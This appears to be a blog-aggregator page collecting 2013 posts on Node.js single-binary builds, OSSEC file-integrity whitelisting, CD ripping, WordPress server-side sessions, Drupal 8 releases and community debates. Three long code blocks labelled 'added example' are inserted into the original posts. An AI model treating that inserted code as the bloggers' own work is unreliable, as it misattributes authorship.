Now you have a custom-built node in out/Release/node. The file size was about 10034856 bytes; you can further strip it down to 6971192 bytes (6.6M).
Now you need to remove the native dependency from your package.json before you build it with nexe.
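The manual edits from the steps above, as an added example (not code from the original post): each function performs one of the text edits on the file named in the post, and apply_edits runs them over an unpacked node-v0.8.x tree. The function names and the use of the zlib entries as insertion anchors in node.gyp are assumptions.

```python
#!/usr/bin/env python3
"""Added example: applies the pty.js embedding edits to a node source tree.
File names follow the post; function names and the zlib anchors are assumptions."""
import re
import sys
from pathlib import Path


def rename_module_export(cc_source):
    """src/node_pty.cc: the last line must read NODE_MODULE(node_pty, init)."""
    return re.sub(r"NODE_MODULE\(\s*pty\s*,", "NODE_MODULE(node_pty,", cc_source)


def register_extension(header):
    """src/node_extensions.h: add node_pty right after node_zlib (idempotent)."""
    if "NODE_EXT_LIST_ITEM(node_pty)" in header:
        return header
    return header.replace(
        "NODE_EXT_LIST_ITEM(node_zlib)",
        "NODE_EXT_LIST_ITEM(node_zlib)\nNODE_EXT_LIST_ITEM(node_pty)", 1)


def add_to_gyp(gyp):
    """node.gyp: list lib/pty.js next to lib/zlib.js and src/node_pty.cc next
    to src/node_zlib.cc, reusing the indentation of the anchor line."""
    for anchor, new in (("'lib/zlib.js',", "'lib/pty.js',"),
                        ("'src/node_zlib.cc',", "'src/node_pty.cc',")):
        if new in gyp:
            continue
        gyp = re.sub(r"^([ \t]*)" + re.escape(anchor) + r"[ \t]*$",
                     lambda m, new=new: m.group(0) + "\n" + m.group(1) + new,
                     gyp, count=1, flags=re.MULTILINE)
    return gyp


def rebind_pty_js(js_source):
    """lib/pty.js: use the built-in binding instead of the compiled addon,
    then rename every remaining `pty.` reference to `binding.`."""
    js_source = js_source.replace(
        "var pty = require('../build/Release/pty.node');",
        "var binding = process.binding('pty');")
    return re.sub(r"\bpty\.", "binding.", js_source)


# file (relative to the node source root) -> edit to apply
EDITS = {
    "src/node_pty.cc": rename_module_export,
    "src/node_extensions.h": register_extension,
    "node.gyp": add_to_gyp,
    "lib/pty.js": rebind_pty_js,
}


def apply_edits(tree):
    """Rewrite the four files in place under `tree`; returns the names changed."""
    changed = []
    for rel, edit in EDITS.items():
        path = Path(tree) / rel
        before = path.read_text()
        after = edit(before)
        if after != before:
            path.write_text(after)
            changed.append(rel)
    return changed


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "node-v0.8.21"
    print("\n".join(apply_edits(root)))
```

Run it after copying node_pty.cc and pty.js into place (the two cp steps above) and before ./configure; the node.gyp edit assumes the 0.8 tree still lists lib/zlib.js and src/node_zlib.cc.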
Packaging the file
A single binary now makes it easy to make a curl installer from it, as it only requires you to download one file. Remember the caveat of this.
And you can still package it up:
- create a rpm, deb, etc.. package from it using fpm
- or create a native MacOSX .app file from it as Mathias Bynens suggests in http://mathiasbynens.be/notes/shell-script-mac-apps
- https://github.com/subtleGradient/Appify-UI
- http://blog.coolaj86.com/articles/how-to-create-an-osx-pkg-installer.html
- build a DMG - http://www.recital.com/index.php?option=com_content&view=article&id=108%3Ahowto-build-a-dmg-file-from-the-command-line-on-mac-os-x&Itemid=59
Extras
Rant about why it's a good or bad idea - Secure Nodejs distribution
More info on the process.binding:
- http://blog.carbonfive.com/2011/03/14/node-js-part-ii-spelunking-in-the-code/
- https://groups.google.com/forum/?fromgroups#!topic/nodejs/R5fDzBr0eEk
Convert nodejs projects to single file/beautifier:
- Npk - https://github.com/cfsghost/npk
- UglifyJS - https://github.com/mishoo/UglifyJS/
- RequireJS - http://requirejs.org/
- Browserify - http://browserify.org/
- OneJS - https://github.com/azer/onejs
Cross compiling:
May 13, 2013
Xavier Mertens
Improving File Integrity Monitoring with OSSEC
FIM or “File Integrity Monitoring” can be defined as the process of validating the integrity of operating system and application files with a verification method using a hashing algorithm like MD5 or SHA1 and then comparing the current file state with a baseline. A hash will allow the detection of changes to file contents, but other information can be checked too: owner, permissions, modification time. Implementing file integrity monitoring is a very good way to detect compromised servers. Not only operating system files can be monitored (/etc on UNIX, the registry on Windows, shared libraries, etc.) but also applications (monitoring your index.php or index.html can reveal a defaced website).
During its implementation, a file integrity monitoring project may face two common issues:
- The baseline used for comparison with the current file status must of course be trusted. To achieve this, it must be stored in a safe place where an attacker cannot find it and cannot alter it!
- The process must be fine-tuned to react only on important changes; otherwise there are two risks: the real suspicious changes will be hidden in the massive flow of false positives, and the people in charge of the control could miss interesting changes.
There are plenty of tools which implement FIM, commercial as well as free. My choice has been OSSEC for a while. My regular followers know that I have already posted lots of articles about it. I also contributed to the project with a patch to add geolocalization to alerts. This time, I wrote another patch to improve the file integrity monitoring feature of OSSEC.
FIM has been part of the OSSEC features for a while and is handled by the syscheckd daemon running on all agents. How does OSSEC address the common issues reported above? To keep the baseline integrity, the databases of files (or of the registry for Windows agents) are stored on the manager itself. This manager is normally a well-protected server where all the OSSEC intelligence is stored. About false positives, OSSEC implements several ways to prevent them. Some files can be ignored with an <ignore> XML tag in ossec.conf:
<syscheck> <ignore>/etc/mnttab</ignore> </syscheck>
This is an easy way to exclude files but it’s a pain to manage! Some files can also be excluded using specific OSSEC rules:
<rule id="100000" level="0">
  <if_group>syscheck</if_group>
  <description>Ignored file changes</description>
  <match>/etc/mnttab|/etc/hosts|/etc/resolv.conf</match>
  <hostname>srv1</hostname>
</rule>
This rule will disable notification if any change is detected on srv1 in /etc/mnttab, /etc/hosts or /etc/resolv.conf. Note that another control exists: by default, when a file has changed three times, further changes will be automatically ignored. Handy but… it could be improved!
When I’m deploying security tools and controls, my goal is to reduce the “noise” as much as possible. A side effect of file integrity monitoring is the number of false-positive alerts generated when patching your systems. Keeping up with the latest patch level is important, but hundreds of files can be replaced by a single new package! That’s why I wrote the following patch for OSSEC (more precisely for the analysisd daemon, which is responsible for decoding and alerting on the events generated by agents).
I added a SQLite3 DB which contains a list of MD5 hashes to ignore when reported by agents. When a file change is reported, its NEW MD5 hash is looked up in the DB. If found, the change is ignored. Why an external SQL database to store the hashes? So that it can easily be populated by external tools, as seen in the following schema:

To activate this feature, apply the patch and create a SQLite3 database:
CREATE TABLE files (
md5sum VARCHAR(32),
file VARCHAR(256),
time DATETIME
);
CREATE UNIQUE INDEX files_idx ON files(md5sum);
Then, just define the MD5 database in the main ossec.conf file on your OSSEC server:
<global> <md5db>/etc/md5.db</md5db> </global>
This database must contain all the MD5 hashes that you want to ignore. On Ubuntu, it’s easy to find the hashes of all installed files in /var/lib/dpkg/info/*.md5sums. I wrote a simple Python script to read those files and populate the SQL database.
#!/usr/bin/python
import fnmatch
import os
import signal
import sqlite3
import sys

DB_PATH = '/opt/ossec/etc/md5db.db'
INFO_DIR = '/var/lib/dpkg/info'

conn = None


def signal_handler(signum, frame):
    # On Ctrl-C, keep what has been inserted so far and exit cleanly
    print("Interrupted!")
    if conn:
        conn.commit()
        conn.close()
    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)
conn = sqlite3.connect(DB_PATH)
c = conn.cursor()
for name in os.listdir(INFO_DIR):
    if not fnmatch.fnmatch(name, '*.md5sums'):
        continue
    with open(os.path.join(INFO_DIR, name), 'r') as f:
        for line in f:
            # dpkg format: "<md5>  <path>"; the path may itself contain spaces
            fields = line.split(None, 1)
            if len(fields) != 2:
                continue
            md5sum, path = fields[0], fields[1].strip()
            try:
                # parameterised query: a file name can never break the SQL
                c.execute('INSERT INTO files VALUES (?, ?, date("now"))',
                          (md5sum, path))
            except sqlite3.Error as e:
                # typically the UNIQUE index rejecting an already known hash
                print("%s: %s" % (md5sum, e.args[0]))
    conn.commit()
conn.close()
After every new patch installation on my Ubuntu box, the database is updated with the new MD5s. As the FIM process is executed every 6 hours (default setting) by OSSEC, you have time to update the database and reduce the false-positive alerts.
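The whitelist lookup described above, as an added example that is not part of the post or of the OSSEC patch: constructed dpkg-style md5sums content is loaded into the post's schema, then syscheck change events are triaged against it the way the patched analysisd would, keyed on the new hash only. The function names, the sample data and the stricter (md5, file) variant are assumptions made here.

```python
#!/usr/bin/env python3
"""Added example: the post's MD5 whitelist, populated and queried in memory.
Sample md5sums content, function names and the strict variant are assumptions."""
import sqlite3

SCHEMA = """
CREATE TABLE files (
    md5sum VARCHAR(32),
    file VARCHAR(256),
    time DATETIME
);
CREATE UNIQUE INDEX files_idx ON files(md5sum);
"""

# Constructed sample of two dpkg .md5sums files. Paths are relative to /
# and may contain spaces; two packages can ship byte-identical files (the
# empty-file hash below), which the UNIQUE index on md5sum rejects twice.
SAMPLE_MD5SUMS = {
    "coreutils.md5sums": (
        "9b3c1f4a0e4e7d6e3b2a1c0f5d8e7a61  bin/ls\n"
        "d41d8cd98f00b204e9800998ecf8427e  usr/share/doc/coreutils/README\n"),
    "hello.md5sums": (
        "d41d8cd98f00b204e9800998ecf8427e  usr/share/doc/hello/NEWS\n"
        "5f2b8c9d1e0a7b6c3d4e5f6a7b8c9d0e  usr/share/hello/file with spaces.txt\n"),
}


def parse_md5sums(text):
    """Yield (md5, absolute path); split on the first whitespace run only,
    so file names containing spaces survive."""
    for line in text.splitlines():
        if not line.strip():
            continue
        md5, path = line.split(None, 1)
        yield md5.lower(), "/" + path.strip()


def build_db(md5sums_files):
    """Populate the post's schema; returns (connection, duplicates skipped)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    seen = 0
    for text in md5sums_files.values():
        for md5, path in parse_md5sums(text):
            seen += 1
            # Parameterised, and OR IGNORE keeps the first row for a hash
            # shared by several files instead of failing on each duplicate.
            conn.execute(
                "INSERT OR IGNORE INTO files VALUES (?, ?, datetime('now'))",
                (md5, path))
    conn.commit()
    stored = conn.execute("SELECT COUNT(*) FROM files").fetchone()[0]
    return conn, seen - stored


def is_whitelisted(conn, new_md5):
    """The lookup as the post describes it: keyed on the NEW hash only."""
    row = conn.execute("SELECT 1 FROM files WHERE md5sum = ?",
                       (new_md5.lower(),)).fetchone()
    return row is not None


def is_whitelisted_strict(conn, new_md5, path):
    """Stricter variant (an assumption, not in the patch): the hash must be
    known for that exact path, so a whitelisted hash showing up at an
    unexpected location is still reported."""
    row = conn.execute("SELECT 1 FROM files WHERE md5sum = ? AND file = ?",
                       (new_md5.lower(), path)).fetchone()
    return row is not None


def triage(conn, events, strict=False):
    """events: (path, new_md5) pairs reported by syscheck; returns the paths
    that would still raise an alert."""
    alerts = []
    for path, md5 in events:
        known = (is_whitelisted_strict(conn, md5, path) if strict
                 else is_whitelisted(conn, md5))
        if not known:
            alerts.append(path)
    return alerts


if __name__ == "__main__":
    conn, skipped = build_db(SAMPLE_MD5SUMS)
    print("duplicate hashes skipped:", skipped)
    events = [
        ("/bin/ls", "9b3c1f4a0e4e7d6e3b2a1c0f5d8e7a61"),         # package update
        ("/bin/ls", "0123456789abcdef0123456789abcdef"),         # unknown content
        ("/usr/sbin/sshd", "9b3c1f4a0e4e7d6e3b2a1c0f5d8e7a61"),  # known hash, wrong path
    ]
    print("hash-only alerts:", triage(conn, events))
    print("strict alerts:", triage(conn, events, strict=True))
```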
The patch is available here.
May 10, 2013
Thomas Vander Stichele
morituri and Hidden Track One Audio
I have tomorrow (saturday) blocked out for a whole day of morituri hacking as I will be home alone.
One of the things a lot of morituri users are puzzled by is its relentless drive to extract every single sample of audio from the CD, currently even if it’s a really short pre-gap that is most likely just an inaccurate master or burn, with no useful audio in it.
For me, that was a design goal of morituri – I want to be able to exactly reproduce a CD as is. That is to say, ripping a CD should extract *all* audio from the CD, and it should be possible to make a copy of that CD and then rip that copy, and end up with exactly the same result as from the original CD. (I’m sure there’s a fancy scientific term for that that I can’t remember right now)
To a lot of other people, it seems to be annoying and they don’t like having those small almost empty files lying around.
So I thought I’d do something about that, and that it might be useful as well to analyze my current collection of tracks and figure out what’s in there. Maybe I can find some hidden gems that I hadn’t noticed before?
So I added a quick task to morituri that calculates the maximum sample value (I didn’t want to use my own level element in GStreamer for this as I wanted to make sure it was actual digital zero; this should be done in an element instead though, but I preferred the five minute hack for this one).
And then I ran:
rip debug maxsample /mnt/nas/media/audio/rip/morituri/own/album/*/00*flac
Sadly, that turned up 0 as the biggest sample for all these tracks!
Wait, what? I spent all that time on getting those secret tracks ripped just to get none? That’s not possible! I know some of those tracks!
Maybe the algorithm is wrong. Nope, it works fine on all the regular tracks.
Oh, crap. Maybe morituri has been ripping silence all this time because my CD drive can’t get that data off. Yikes, that would be a bit of egg on my face.
No, it works if I check that Bloc Party track I know about.
Ten minutes of staring at the screen to realize that, while I was outputting names from a variable from the for loop over my arguments, the track I was actually passing to the task was always the first one. Duh. Problem solved.
As for what I found in my collection:
- a cute radio jingle that brought back memories from a live bootleg I had made myself of Bloem. That’s from over ten years ago, but that must have been around the time I learned about the existence of HTOA and wanted to get one in
- found unknown HTOA tracks on Art Brut’s Bang Bang Rock & Roll, Mew’s Half the world is watching me; not their best stuff
- soundscapey or stagesetting tracks on QOTSA’s Songs for the Deaf, Motorpsycho’s Angels and Daemons at play And Blissard; not that worth it (the Blissard track was ok, but really quiet)
- Pulp hid a single piano chord in a 2 second pre-gap on This is Hardcore; very curious. It’s not an intro to the first track, because it doesn’t fit with the sound at all.
- Damien Rice hid a demo version of 9 Crimes (the first track) in the pregap; instead of piano and female vocals, he plays guitar and sings all the parts.
- Got reacquainted with my favourite HTOA tracks: the orchestral quasi-wordless medley on the Luke Haines/Das Capital disc; the first Bloc Party album with a beautiful instrumental (up there with the hidden track at the end of Placebo’s first album; both bands delivering an atypical but stunning moodscape); the beautiful cover of Ben Kenobi’s Theme by Arab Strap on the Cherubs EP (no idea why that landed in my album dir, that needs to be fixed); the silly Soulwax skit for their second album.
Of course, Wikipedia has the last word on everything
I note that they think Pulp recorded a cymbal, not a piano. And now that I see the title of the QOTSA hidden track, I get the joke I think.
In total, in my album collection of 1564 full CDs, I have 171 HTOAs ripped, 138 tracks of pure digital silence, and only about 11 are actually useful tracks.
I expected to find more gems in my collection. I’ll go through ep’s, singles and compilations next just to be sure.
But with this code in hand, maybe it’s time to add something to morituri to save the silent HTOA tracks as pure .cue information.
Frank Goossens
Music from Our Tube; Harper Blynn
“Knife” is great songwriting by New York’s Harper Blynn, performed live on a balcony in not-so-sunny LA for BalconyTV.

Watch this video on YouTube or on Easy Youtube.
May 09, 2013
Frank Goossens
Dude, where’s my WordPress session?
WordPress is a favourite target for hackers. Some say that is because it is inherently insecure, but in reality WordPress is mainly a target because of its popularity, because people don’t keep their installations up to date or use easy-to-guess usernames and passwords, and because of vulnerabilities in plugins rather than in WordPress itself.
There is, however, one security-related shortcoming in WordPress from a design point of view: sessions are not stored server-side. If someone logs in, a cookie is set in the browser containing the username, a session expiration timestamp and a hash. With every new request to WordPress that cookie (and specifically the hash) is checked to validate the session, but there is no check to see whether such a session was indeed ever created.
This can be considered mainly a theoretical shortcoming, not an immediately exploitable vulnerability, because:
- session-cookies are set with the HTTPOnly-flag so XSS should not be an issue
- in an ideal world all traffic, once logged in, would be over HTTPS, securing against network sniffing.
But there are other (albeit less obvious) ways to steal cookies or even create new ones to gain unauthorized access, as demonstrated in this very detailed blogpost. As explained in that article, there is no way to block “fake” session cookies from gaining access (your OTP plugin won’t protect you either) and there is no functionality to monitor and, if needed, delete sessions.
So … I wrote a small proof-of-concept plugin that gets triggered upon login, logout and session verification (i.e. on each request) and which stores sessions server-side, automatically logging out unknown sessions. With that in place, lots of other optional features could easily be added:
- display a list of all known current sessions
- allow one or more sessions to be removed
- compare IP address at session verification against the one at session creation and notify or logout if no match
- compare User Agent (and optionally some HTTP accept-headers) at session verification against the one at session creation and notify or logout if no match
- create an audit log
- …
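A small model of the design discussed above, as an added example that is not code from the post or from the proof-of-concept plugin: the stateless check validates only the cookie's hash and expiry, while the server-side registry records sessions at login, drops them at logout and rejects any cookie it has never seen, with the IP/User-Agent comparison and audit log from the feature list. The cookie layout (username, expiration, hash) follows the post; the HMAC construction, the class and method names and the demo key are simplifications chosen here, not WordPress's real implementation.

```python
#!/usr/bin/env python3
"""Added example: stateless cookie validation next to a server-side session
registry. Cookie format, HMAC construction and names are assumptions."""
import hashlib
import hmac
import time

SECRET_KEY = b"constructed-demo-key-not-a-real-secret"  # placeholder, not a real key


def make_cookie(username, expiration, key=SECRET_KEY):
    """Stateless cookie as the post describes it: username|expiration|hash."""
    msg = f"{username}|{expiration}".encode()
    digest = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return f"{username}|{expiration}|{digest}"


def stateless_check(cookie, now, key=SECRET_KEY):
    """Hash and expiry only; returns the username or None. Nothing here can
    tell whether this session was ever created through a login."""
    try:
        username, expiration, digest = cookie.split("|")
        expiration = int(expiration)
    except ValueError:
        return None
    expected = hmac.new(key, f"{username}|{expiration}".encode(),
                        hashlib.sha256).hexdigest()
    if expiration < now or not hmac.compare_digest(digest, expected):
        return None
    return username


class SessionRegistry:
    """Server-side store the proof-of-concept adds: sessions are recorded at
    login, removed at logout, and every request must match a known one."""

    def __init__(self):
        self.sessions = {}   # cookie -> {"ip": ..., "ua": ...} at creation
        self.audit = []      # (event, username, ip) audit log

    def on_login(self, cookie, ip, user_agent):
        self.sessions[cookie] = {"ip": ip, "ua": user_agent}
        self.audit.append(("login", cookie.split("|")[0], ip))

    def on_logout(self, cookie):
        self.sessions.pop(cookie, None)
        self.audit.append(("logout", cookie.split("|")[0], None))

    def revoke(self, username):
        """The 'remove one or more sessions' feature from the list above."""
        for c in [c for c in self.sessions if c.split("|")[0] == username]:
            self.on_logout(c)

    def on_verify(self, cookie, now, ip, user_agent, key=SECRET_KEY):
        """Per-request hook: stateless validation, then the registry, then
        the optional IP / User-Agent comparison against session creation."""
        username = stateless_check(cookie, now, key)
        if username is None:
            return "invalid"
        rec = self.sessions.get(cookie)
        if rec is None:
            # Hash checks out but no login created it: log out and record it.
            self.audit.append(("unknown-session", username, ip))
            return "unknown"
        if rec["ip"] != ip or rec["ua"] != user_agent:
            self.audit.append(("client-mismatch", username, ip))
            return "mismatch"
        return "ok"

    def list_sessions(self):
        """The 'display all known current sessions' feature."""
        return [(c.split("|")[0], int(c.split("|")[1]), r["ip"])
                for c, r in self.sessions.items()]


if __name__ == "__main__":
    now = int(time.time())
    reg = SessionRegistry()
    c = make_cookie("admin", now + 3600)
    reg.on_login(c, "192.0.2.10", "Firefox")
    print(reg.on_verify(c, now, "192.0.2.10", "Firefox"))    # ok
    print(reg.on_verify(c, now, "198.51.100.7", "Firefox"))  # mismatch
    reg.on_logout(c)
    # The hash is still valid after logout; only the registry rejects it.
    print(stateless_check(c, now), reg.on_verify(c, now, "192.0.2.10", "Firefox"))
```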
But … I don’t want to do this on my own. I have 3 plugins already, 2 of which are semi-popular and for which I try to do regular releases and provide great support (and I have a daytime-job and a wife and daughter with whom I love to spend quality time as well). Moreover I really don’t want the plugin to “just” be open source, but I want it to be developed in an open source, collaborative manner as well.
So if you’re a WordPress coder, a security consultant or just an innocent passer-by and you are willing to code, review code, translate or document, then do drop me a line. Fame (but not fortune) will be yours!
Dries Buytaert
Reducing risk in the Drupal 8 release schedule
Post-Drupal 8's feature freeze, we find ourselves in a similar state as we did after Drupal 7's feature freeze:
- Some initiatives are mostly done, and now onto clean-ups.
- Others are mostly architecturally there, but still have some pretty big gaps.
- Still others are either not yet architecturally complete, have a major amount of integration/conversion work left, and/or have many outstanding critical/major bugs.
From here on out, we need to be more strategic about what patches we do and do not allow into Drupal core directly, and this means we have to make some tough decisions. Every patch we commit needs to not move Drupal 8 further from a "shippable state".
There are essentially two categories of initiatives (both official and unofficial) that are incomplete:
- Code already in HEAD, that we do not plan on reverting, and completion of which is critical to releasing Drupal 8. Examples are CMI, Entity NG, Router conversions. Incremental patches committed to these issues help move Drupal towards release.
- Code not currently in HEAD, or libraries that are sitting around effectively unused by the rest of Drupal. Examples are Twig, CSS re-organization, and parts of SCOTCH. Incremental patches committed to these issues move Drupal towards "uncharted territory", and could put the release of Drupal 8 at risk.
Therefore, the core committers plan to employ the following strategy when deciding what we do/don't commit to Drupal 8 going forward:
First, a patch will be evaluated to see if it belongs to a larger "meta" issue. For the vast majority of issues in the Drupal 8 queue, the answer will be no. For example, routine bug fixes and self-contained DX (Developer Experience) improvements can simply be committed once they're ready.
If an issue is part of a larger meta issue, the question will be whether that meta issue is critical to shipping Drupal 8. If so, the "does this move us towards release?" question is satisfied, and these patches will be committed as they're ready. An example of this is individual CMI conversions; we cannot ship Drupal 8 without all parts of it being deployable through the configuration management system. Similarly, we cannot ship with two methods of declaring routes.
If the meta issue is not deemed critical for release, but we can still ship Drupal 8 with part of it done, then we will also commit patches as they're ready. Views conversions are a good example of this. While it would be nice to ship Drupal 8 with all administrative pages converted to Views, we can still ship Drupal 8 with some converted and others not.
If the patch is part of a larger, non-critical meta issue, but getting part of it done is worse than getting none of it done (an incomplete state will hold up release of Drupal 8), then we're in a "danger zone" and need to look at possible options:
- First, we should see if the patch can be re-worked, or parts of it split off, into self-contained issues. Then those issues' patches can just be committed via the normal process.
- If there is no other option than completing the entire meta issue, then core maintainers will work with each individual team to determine a "cut-off date" for their work (which allows sufficient time prior to July 1 for integration), as well as the safest way for their work to continue without holding up the release. Possible strategies could include:
- a larger patch containing the meta issue in its entirety, with no follow-ups, where it is still feasible to use a patch-based workflow (e.g. CSS re-organization).
- a branch off the Drupal core repository that is merged in when deemed acceptable in the case of larger conversion efforts (e.g. Twig)
- a sandbox project where larger refactoring is still necessary (e.g. SCOTCH).
Summary
The bottom line is that every patch we commit to Drupal 8 from now on has to help us get to a shippable state: it has to work, be performant (or be a required stepping stone towards more performant code), be well-documented and well-tested, and provide the right developer experience (DX). Getting Drupal 8 ready for release will take a big effort, and the core contributors could use all the help they can get. Now is the time to jump in and help.
May 08, 2013
Xavier Mertens
The Race For Resources
Today, disk space is not an issue for most of us. I remember when my father came back home with my first hard drive (80MB!) for my Amiga in the Nineties. My reaction was “Wow, we will never fill it!“. Today, if I add up all my storage at home, I’m above 10TB! And I’m sure that I will have to add more capacity in the coming months. No, this blog post is not related to “big data” but is more a reflection about how developers write applications today. Again, when I was learning programming languages, professors always reminded the students to keep an eye on our resources: memory, CPU cycles, I/O and storage. One of the golden rules was: “If you allocated memory, don’t forget to free it! malloc() means free()“. Yeah, at that time, there was no garbage collector. I’m a little bit nostalgic tonight!
Today, computer resources are not a problem anymore. Their prices continue to decrease and the reflex of most developers is just to add resources (“Your application is slow? Add 2 cores and 2 gigs of memory“).
I’ll show you a good example of the explosion of resource requirements. Today I was performing some cleanup on my corporate laptop. Being a consultant, it runs plenty of tools such as management consoles provided by $VENDORS. Working for multiple customers running different versions of this product (a well-known firewall brand), I’ve different versions of the tools installed. Of course, I need to keep multiple versions because you need to use the right one to access the firewall running the corresponding version. Just have a look at this screenshot:
I wonder how much disk storage the next version of the console will ask for…
Stephane Delcroix
It's all about monkeys
Microsoft Belgium was hosting the session, and the room was packed!
I really enjoyed that evening, and just wanted to thank you all: attendees for their presence and interactions, MADN and DNH for the invite and the bottle of wine, Microsoft Belgium for the place, food and drinks, and Xamarin for the give away licences, monkeys and t-shirts.
Lionel Dricot
The Cost of Being Convinced
When debating, we usually assume that opinions are merely the result of being exposed to logical arguments, and of understanding them. If arguments are logical and understood, people will change their mind.
Anybody who has been on the internet long enough knows that this never happens. Everybody sticks to their own position. But why?
The reason is simple: changing opinion has a cost. A cost that we usually ignore. A good exercise is to try to evaluate this cost before any debate. For yourself and for the counterpart.
Let’s take a music fan who is convinced that piracy hurts artists. Convincing him that it’s not the case and that piracy is not immoral means to him that, firstly, he was dumb enough to be brainwashed by major companies and that, secondly, the money spent on CDs was a complete waste.
Each time you tell him “Piracy is not hurting artists and is not immoral”, he will hear “You are stupid and you wasted money for years”.
This is quite a high cost but not impossible to overcome. It means that arguments should not only convince him, but also overcome that cost.
Worse: intuitively, we take the symmetry of costs for granted.
Let’s take the good old god debate.
For the atheist, the cost of being convinced is usually admitting being wrong. This is a non-negligible cost but sometimes possible. Most non-hardcore atheists are thus quite ready to be convinced. They enter any religious debate expecting the same mindset from the opponents.
But the opposite is not true. For a religious person, believing in god is often a very important part of her life. In most cases, this is something inherited from her parents. Some life choices have been made because of her belief. The person is often engaged in activities and societies related to her belief. It could go as far as being the core foundation of her social circles.
When you say “God doesn’t exist”, the religious person will hear “You are stupid, your parents were liars, you wrecked your life and you have no reason to see your friends anymore”.
It looks like a joke, right? It isn’t. But, subconsciously, it is exactly what people feel and understand. No wonder that religious debates are so emotional.
Why do you think that some religious communities fight any individual atheist? Why do you think that every religion always tries to get money or personal involvement from you? Because they want to increase the cost of not believing in them. Scammers understand that very well: they will ask you for more and more money to increase the cost of you realizing it’s a scam.
Before any argument, any debate, ask everyone to sincerely answer the question “What will happen if I’m convinced? What will I do? What will change in my life?”.
More often than not, changing opinion is simply not an option. Which settles any debate before it starts.
And you? Which of your opinions are too costly to be changed? And what can you do to improve the situation?
Picture by r.nial.bradshaw
Ruben Vermeersch
It’s all about being productive
Stuff like this makes me sad:
apparently rethinkdb’s official js client is coffeescript hahahah #fail
— TJ Holowaychuk (@tjholowaychuk) May 7, 2013
Also, the github issue where TJ requests that everything gets rewritten in plain JavaScript: https://github.com/rethinkdb/rethinkdb/issues/766
We’ve been here before
Language discussions aren’t new (nor is vim vs. emacs). In the GNOME community we’ve seen a ton of them. Just recently there was a huge one at the DX Hackfest.
GNOME/Mono developers have certainly received their dose of crap thrown at them. But so have GNOME developers that preferred Vala, Python, JavaScript, or even just GObject/C. Whatever you seem to be using, it’s never the right thing for someone.
Have all these years of shedding words over it solved anything? Frankly: no. We are still seeing a large combination of languages being used and all of those projects have good reasons to do so.
I get TJ’s point though: by using CoffeeScript, the rethinkdb people are making it harder for the wider JS community to contribute to their project. But…
It really doesn’t matter
Most open-source projects (or modules) don’t have a ton of contributors. It’s usually a modest team of core maintainers/developers that do the bulk of the work. And that’s fine: the success of a project should not be measured by the number of contributors, but by the quality of the software it produces.
This smallish team of core developers will have their own good reasons for picking up a certain language. They’ll use the language that they feel most productive with for the task at hand. And that’s a good thing, they are mostly the people that move the project forward.
The biggest barrier to contributing to a project is not the language; there are plenty of projects written in unproductive languages that get a ton of contributions. Any good programmer can pick up a new language quickly (and TJ is more than just a good programmer, he’s a fantastic one, much respect). The bigger hurdle is the specific domain knowledge involved.
Let’s all agree to disagree and have some respect for each other’s opinions, they are all valid anyway.
PS: I’ll be heavily moderating comments that try to turn this into a flame-war. I’m writing this to find some more respect and understanding.
May 07, 2013
Thomas Vander Stichele
Votes for talks at open source conferences
I’ve never been a fan of voting for talks, because it tends to be poorly implemented under the guise of democracy. Of course it’s easy for me to talk, I’ve never organized anything at that scale.
I’ll give two examples of why I feel this way, one of which triggered today’s blog post.
First off, my colleague Marek submitted a talk to Djangocon. The talk was about how to use feat (a toolkit we wrote for livetranscoding) to serve Django pages, but in such a way that they can use Deferreds to remove the concurrency bottleneck of “1 request at a time” per process running Django.
Personally, to me, this is one of the most irritating design choices of Django – from the ground up it was built synchronously (which could have been fine in most places). But the fact that, when you get a request, you have to always synchronously respond to it (and block every other request for that process in the meantime) is a design choice that could have easily been avoided.
In our particular use case, it was really painful. If our website has to do an API request to some other service we don’t control that can easily take 30 seconds, our process throughput suddenly becomes 2 pages per minute. All the while, the server is sitting there waiting.
Yes, you can throw RAM at the problem and start 30 times more processes; or thread out API requests; or farm it out to Celery, and do some back-and-forthing to see when the call’s done. Or do any other number of workarounds for a fundamental design choice.
Since we like Twisted, we preferred to throw Twisted at the problem, and ended up with something that worked.
Anyway, that’s a lot of setup to explain what the talk was about. Marek submitted the talk to DjangoCon, and honestly I didn’t expect it to get much traction because, when you’re inside Django, you think like Django, and you don’t really realize that this is a real problem. Most people who do realize it switch away to something else.
But to my surprise, Marek’s talk was the most-voted talk! I wish I could link to the results, but of course that vote site is no longer online.
I guess I expected that would mean he’d be presenting at DjangoCon this year. So I asked him today when his talk was, and he said “Oh that’s right. I did not get accepted.”
Well, that was a surprise. Of course, the organising committee reserves the right to decide on their own – maybe they just didn’t like the talk. But if you ask your potential visitors to vote, you’d expect the most-voted talk to make it onto the schedule, no?
The feedback Marek got from them was surprising too, though. Their first response was that this talk was too similar to another talk, titled “How to combine JavaScript & Django in a smart way”. Now, I’m not a JavaScript expert, but from the title alone I can already tell that it’s very unlikely that these two talks have many similarities beyond the word ‘Django’.
After refuting that point, their second reason was that they wanted more experienced speakers (but they didn’t ask Marek for his experience), and their third reason was that the talk was in previous editions of DjangoCon US/EU (it’s unclear whether they meant his talk or the JavaScript one, but Marek’s definitely wasn’t, and we couldn’t find any mention of the other talk in previous conferences. I’m also not sure why that even matters one way or the other. This email thread was in Polish, so I have to rely on Marek’s interpretation of it)
Personally, my reaction would have been to complain to the organizers or Django maintainers. Marek’s phlegmatic attitude was much better though – after such an exchange, he simply doesn’t want to have anything to do with the conference.
He’s probably right – it’s hard to argue with someone who doesn’t want to invite you and is lying about the reasons.
The second example is BCNDevCon, a great conference here in Barcelona, organized by a guy who used to work for Flumotion who I have enormous respect for. I’ve never seen anyone create such a big conference over so little time.
He believes strongly in the democratic aspect, and as far as I can tell constructs the schedule solely based on the votes.
Sadly I didn’t go to the last one, and the reason is simply because I felt that the talks that made it were too obviously corporate. A lot of talks were about Microsoft products, and you could tell that they won votes because people’s coworkers voted on talks. I’m not saying that’s necessarily wrong – given that he worked at our company and has friends here, I’m sure people working here presenting at his conference have also done vote tending. It’s natural to do so. But there should be a way to balance that out.
I think the idea of voting is good, but implementation matters too. Ideally, you would only want people that are actually going to show up to vote. I have no idea how you can ensure that, though. Do you ask people to pre-pay? Do you ask them to commit to pay if at least 50% of their votes make it into the final schedule, kickstarter-style?
